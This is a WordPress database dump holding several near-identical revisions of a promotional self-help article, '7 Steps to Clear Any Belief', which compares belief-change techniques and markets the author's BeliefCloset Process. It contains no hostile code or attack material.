INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2140, 2, '2015-03-17 01:54:46', '2015-03-17 06:54:46', 'After studying more than twenty different belief-change methodologies, I identified seven crucial elements required for permanent belief change.  I tested these methodologies personally, and also with clients.  If all seven elements are present, a belief can be completely eliminated from the core of the psyche.  If any of the elements are missing, results will be incomplete, temporary, or ineffective.\r\n\r\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\r\n\r\nWhen the belief-change process is partial, or incomplete, clients offer comments such as:\r\n<ul>\r\n	<li>“I felt a little better.”</li>\r\n	<li>“I got something out of the process, but it didn’t rock my world.”</li>\r\n	<li>“The process seemed to work for a while, then it faded.”</li>\r\n	<li>“The belief was gone right after the process ended, but it returned two days later.”</li>\r\n	<li>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</li>\r\n</ul>\r\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return to haunt one''s consciousness like a rash that never quite disappears.  The belief continues to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.\r\n\r\nI tested these techniques, along with many others:\r\n<ul>\r\n	<li>Affirmations</li>\r\n	<li>EFT (Tapping)</li>\r\n	<li>Neuro-Linguistic Programming (NLP)</li>\r\n	<li>Access Consciousness</li>\r\n	<li>“The Work” of Byron Katie</li>\r\n	<li>The Lefkoe Method</li>\r\n	<li>The Avatar Materials</li>\r\n</ul>\r\nI analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  This is what I discovered:\r\n<ol>\r\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\r\n	<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\r\n	<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\r\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n	<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n	<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\r\n</ol>\r\nAfter my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.\r\n\r\nI needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.\r\n\r\nI created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\r\n\r\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\r\n\r\nThese are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:\r\n<ol>\r\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.\r\n\r\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\r\n\r\nClear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system.  It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\r\n\r\n<em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\r\n\r\n&nbsp;', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 01:54:46', '2015-03-17 06:54:46', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0),
(2142, 2, '2015-03-17 01:59:42', '2015-03-17 06:59:42', 'After studying more than twenty different belief-change methodologies, I identified seven crucial elements required for permanent belief change.  I tested these methodologies personally, and also with clients.  If all seven elements are present, a belief can be completely eliminated from the core of the psyche.  If any of the elements are missing, results will be incomplete, temporary, or ineffective.\r\n\r\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\r\n\r\nWhen the belief-change process is partial, or incomplete, clients offer comments such as:\r\n<ul>\r\n	<li>“I felt a little better.”</li>\r\n	<li>“I got something out of the process, but it didn’t rock my world.”</li>\r\n	<li>“The process seemed to work for a while, then it faded.”</li>\r\n	<li>“The belief was gone right after the process ended, but it returned two days later.”</li>\r\n	<li>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</li>\r\n</ul>\r\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return like a rash that never quite disappears... <!--more-->With most of these methods, the belief continued to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.\r\n\r\nI tested these techniques, along with many others:\r\n<ul>\r\n	<li>Affirmations</li>\r\n	<li>EFT (Tapping)</li>\r\n	<li>Neuro-Linguistic Programming (NLP)</li>\r\n	<li>Access Consciousness</li>\r\n	<li>“The Work” of Byron Katie</li>\r\n	<li>The Lefkoe Method</li>\r\n	<li>The Avatar Materials</li>\r\n</ul>\r\nI analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  This is what I discovered:\r\n<ol>\r\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\r\n	<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\r\n	<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\r\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n	<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n	<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\r\n</ol>\r\nAfter my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.\r\n\r\nI needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.\r\n\r\nI created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\r\n\r\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\r\n\r\nThese are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:\r\n<ol>\r\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.\r\n\r\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\r\n\r\nClear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system.  It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\r\n\r\n<em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\r\n\r\n&nbsp;', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 01:59:42', '2015-03-17 06:59:42', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0),
(2141, 2, '2015-03-17 01:56:27', '2015-03-17 06:56:27', '<p>After studying more than twenty different belief-change methodologies, I identified seven crucial elements required for permanent belief change.  I tested these methodologies personally, and also with clients.  If all seven elements are present, a belief can be completely eliminated from the core of the psyche.  If any of the elements are missing, results will be incomplete, temporary, or ineffective.</p>\r\n<p>Most of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.</p>\r\n<p>When the belief-change process is partial, or incomplete, clients offer comments such as:</p>\r\n<ul>\r\n<li>“I felt a little better.”</li>\r\n<li>“I got something out of the process, but it didn’t rock my world.”</li>\r\n<li>“The process seemed to work for a while, then it faded.”</li>\r\n<li>“The belief was gone right after the process ended, but it returned two days later.”</li>\r\n<li>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</li>\r\n</ul>\r\n<p>I began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return to haunt one''s consciousness like a rash that never quite disappears.  The belief continues to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.</p>\r\n<p>I tested these techniques, along with many others:</p>\r\n<ul>\r\n<li>Affirmations</li>\r\n<li>EFT (Tapping)</li>\r\n<li>Neuro-Linguistic Programming (NLP)</li>\r\n<li>Access Consciousness</li>\r\n<li>“The Work” of Byron Katie</li>\r\n<li>The Lefkoe Method</li>\r\n<li>The Avatar Materials</li>\r\n</ul>\r\n<p>I analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  This is what I discovered:</p>\r\n<ol>\r\n<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\r\n<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\r\n<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\r\n<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\r\n</ol>\r\n<p>After my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.</p>\r\n<p>I needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.</p>\r\n<p>I created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.</p>\r\n<p><em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.</p>\r\n<p>These are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:</p>\r\n<ol>\r\n<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\n<p>Guided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.</p>\r\n<p>It is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!</p>\r\n<p>Clear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system.  It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.</p>\r\n<p><em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.</p>\r\n<p>&nbsp;</p>\r\n', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 01:56:27', '2015-03-17 06:56:27', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0),
(2143, 2, '2015-03-17 02:01:18', '2015-03-17 07:01:18', '<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset.jpg"><img class="alignleft  wp-image-956" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset-250x300.jpg" alt="boat on spectacular sunset" width="143" height="172" /></a>After studying more than twenty different belief-change methodologies, I identified seven crucial elements required for permanent belief change.  I tested these methodologies personally, and also with clients.  If all seven elements are present, a belief can be completely eliminated from the core of the psyche.  If any of the elements are missing, results will be incomplete, temporary, or ineffective.\r\n\r\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\r\n\r\nWhen the belief-change process is partial, or incomplete, clients offer comments such as:\r\n<ul>\r\n	<li>“I felt a little better.”</li>\r\n	<li>“I got something out of the process, but it didn’t rock my world.”</li>\r\n	<li>“The process seemed to work for a while, then it faded.”</li>\r\n	<li>“The belief was gone right after the process ended, but it returned two days later.”</li>\r\n	<li>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</li>\r\n</ul>\r\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return like a rash that never quite disappears... <!--more-->With most of these methods, the belief continued to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.\r\n\r\nI tested these techniques, along with many others:\r\n<ul>\r\n	<li>Affirmations</li>\r\n	<li>EFT (Tapping)</li>\r\n	<li>Neuro-Linguistic Programming (NLP)</li>\r\n	<li>Access Consciousness</li>\r\n	<li>“The Work” of Byron Katie</li>\r\n	<li>The Lefkoe Method</li>\r\n	<li>The Avatar Materials</li>\r\n</ul>\r\nI analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  This is what I discovered:\r\n<ol>\r\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\r\n	<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\r\n	<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\r\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n	<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n	<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\r\n</ol>\r\nAfter my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.\r\n\r\nI needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.\r\n\r\nI created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\r\n\r\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\r\n\r\nThese are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:\r\n<ol>\r\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.\r\n\r\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\r\n\r\nClear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system.  It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\r\n\r\n<em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\r\n\r\n&nbsp;', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 02:01:18', '2015-03-17 07:01:18', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
